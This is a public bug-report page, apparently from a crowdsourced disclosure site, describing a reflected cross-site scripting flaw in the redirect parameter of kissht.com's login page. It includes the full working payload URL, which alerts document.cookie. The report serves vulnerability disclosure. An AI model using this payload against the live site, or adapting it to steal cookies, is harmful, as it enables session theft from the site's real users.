Bug on Kissht - Vulnerability Name : Cross Site Scripting Vulnerable URL : https://kissht.com/login?redirect=digi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E Vulnerable Parameter : redirect Vulnerable Payload : digi"/><script>alert(document.cookie)</script> How to reproduce this issue: 1. Visit the url it will give an XSS popup. https://kissht.com/login?redirect=digi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E POC : Screenshort can be found in the attachment.

Domain: https://kissht.com/login?redirect=digi%22/%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Tweet Share

Reported on kissht.com

Total # of issues reported = 3

Reported by mrhacker14012001

Total Points of mrhacker14012001 = 13

Browser Version: 60.0

Operating System: Linux

OS Version:

Bug Type: Security
Status: open
Added on: May 16, 2019, 3:01 a.m.


OCR Results:

OCR not installed


No comment added yet. Be the first to comment!